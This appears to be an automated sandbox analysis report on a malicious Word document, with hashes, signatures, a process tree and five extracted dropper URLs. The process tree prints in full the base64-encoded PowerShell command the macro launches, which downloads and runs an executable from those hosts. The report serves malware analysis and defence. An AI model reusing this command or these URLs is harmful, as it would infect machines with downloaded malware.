Analysis

  • max time kernel
    117s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    15-05-2024 05:20

General

  • Target

    44b255cd98fa287a1fa1ce9880cf876d_JaffaCakes118.doc

  • Size

    146KB

  • MD5

    44b255cd98fa287a1fa1ce9880cf876d

  • SHA1

    3fcd2f010e500500cba970330302ec0a2be952a0

  • SHA256

    2740a4f84916260f7c2620ac601b2a6018e8ea37064817a34799eb260cf72a62

  • SHA512

    973379b6f82bedaa655226a96224f95663c389c749fb7b9062ff6676ac8b6811b0ec230d45b992257da50e8306d319c83b67ac13cd247c65c4a9fbf25706be50

  • SSDEEP

    3072:C7BEXb52k407g7Shs9RAQP4Ht4E/zovcdR:0cb52khFhs/A64HyE/svcD

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://purphost.com/Kt1eWvVze

exe.dropper

http://godfreybranco.com/yTX8dwH

exe.dropper

http://psi_test.farseasty.com/TbNnQfP

exe.dropper

http://facetickle.com/BNdtnlPbsh

exe.dropper

http://taoweb3trieu.com/mETrZmz

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\44b255cd98fa287a1fa1ce9880cf876d_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1688
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PoWersheLL.exe
      PoWersheLL -e JABhAEcAZgBRAFoAWQBIAGkAPQAoACcAVwAnACsAJwBDAEgAWABMAEgAJwApADsAJABCAG0AaAB2AFMAVgA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABFAGEAMABqAHUATAA5AD0AKAAnAGgAdAB0AHAAOgAvACcAKwAnAC8AcAB1AHIAcAAnACsAJwBoAG8AcwB0AC4AYwBvAG0ALwBLAHQAMQBlAFcAdgBWAHoAZQBAACcAKwAnAGgAdAB0AHAAJwArACcAOgAvAC8AJwArACcAZwAnACsAJwBvAGQAZgAnACsAJwByAGUAeQBiAHIAYQBuAGMAbwAuAGMAbwBtAC8AeQBUAFgAOAAnACsAJwBkAHcASABAAGgAdAB0AHAAOgAvAC8AcABzAGkAXwB0AGUAcwAnACsAJwB0AC4AZgBhAHIAJwArACcAcwBlAGEAcwB0AHkALgBjAG8AbQAvAFQAYgBOACcAKwAnAG4AUQBmAFAAQABoAHQAJwArACcAdABwACcAKwAnADoALwAnACsAJwAvAGYAYQAnACsAJwBjAGUAdAAnACsAJwBpAGMAawBsAGUALgBjAG8AbQAvACcAKwAnAEIATgBkAHQAbgBsACcAKwAnAFAAYgBzAGgAQABoAHQAJwArACcAdAAnACsAJwBwADoALwAvAHQAYQBvAHcAZQBiADMAJwArACcAdAByACcAKwAnAGkAZQB1AC4AJwArACcAYwBvACcAKwAnAG0ALwBtAEUAVAByAFoAJwArACcAbQB6ACcAKQAuAFMAcABsAGkAdAAoACcAQAAnACkAOwAkAFUANgBYAFQAUwB1AEsAawA9ACgAJwB3AHAAcgB3AHcARAB0ACcAKwAnAE8AJwApADsAJABpAEMAegBNADQAMwBLACAAPQAgACgAJwAxACcAKwAnADUANAAnACkAOwAkAFQAUgBKAHcAZgBVAD0AKAAnAGkAbQBGAHoARgAnACsAJwB2ACcAKwAnAGsAJwApADsAJABLAGoAdwBaAHMASABxAD0AJABlAG4AdgA6AHQAZQBtAHAAKwAnAFwAJwArACQAaQBDAHoATQA0ADMASwArACgAJwAuACcAKwAnAGUAeABlACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAGMAagA4AFIANQBPACAAaQBuACAAJABFAGEAMABqAHUATAA5ACkAewB0AHIAeQB7ACQAQgBtAGgAdgBTAFYALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAYwBqADgAUgA1AE8ALAAgACQASwBqAHcAWgBzAEgAcQApADsAJABwAHUARwB3AGQASgA9ACgAJwBZAG4AUQAnACsAJwBFAG8ANwA4ACcAKQA7AEkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAEsAagB3AFoAcwBIAHEAKQAuAGwAZQBuAGcAdABoACAALQBnAGUAIAA0ADAAMAAwADAAKQAgAHsASQBuAHYAbwBrAGUALQBJAHQAZQBtACAAJABLAGoAdwBaAHMASABxADsAJABBAG4ATwBpAHoAWgBtAD0AKAAnAFMAMQAnACsAJwAyAGwAQgBNACcAKQA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAewB9AH0AJABXAFkAegBWADUASQBqAD0AKAAnAGsAJwArACcAUgBZAEEAcAAnACsAJwBIACcAKQA7AA==
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1124
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1668

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
      Filesize

      20KB

      MD5

      22b6fc312abbf6bcd5cd3734104d02f2

      SHA1

      4d9a1fe8a853e3948e19ad67a043b6b9091b07a2

      SHA256

      fb5d724136b79613e6497ce0922ee5d64aa44b8e742a1ef2644a1a003d57819d

      SHA512

      a3e83ad4a278f74c21a41f62469ed8807146689fcd355255a3fb55f066f9ef532514c7019173f956abccebbec790087c5196948b0f9b6481e55e7f6ce8f030fe

    • memory/1688-53-0x0000000006130000-0x0000000006230000-memory.dmp
      Filesize

      1024KB

    • memory/1688-62-0x0000000006130000-0x0000000006230000-memory.dmp
      Filesize

      1024KB

    • memory/1688-17-0x0000000006130000-0x0000000006230000-memory.dmp
      Filesize

      1024KB

    • memory/1688-18-0x00000000064C0000-0x00000000065C0000-memory.dmp
      Filesize

      1024KB

    • memory/1688-43-0x0000000006130000-0x0000000006230000-memory.dmp
      Filesize

      1024KB

    • memory/1688-0-0x000000002F951000-0x000000002F952000-memory.dmp
      Filesize

      4KB

    • memory/1688-86-0x0000000006130000-0x0000000006230000-memory.dmp
      Filesize

      1024KB

    • memory/1688-2-0x000000007173D000-0x0000000071748000-memory.dmp
      Filesize

      44KB

    • memory/1688-94-0x000000007173D000-0x0000000071748000-memory.dmp
      Filesize

      44KB

    • memory/1688-95-0x0000000006130000-0x0000000006230000-memory.dmp
      Filesize

      1024KB

    • memory/1688-97-0x0000000006130000-0x0000000006230000-memory.dmp
      Filesize

      1024KB

    • memory/1688-1-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1688-119-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1688-120-0x000000007173D000-0x0000000071748000-memory.dmp
      Filesize

      44KB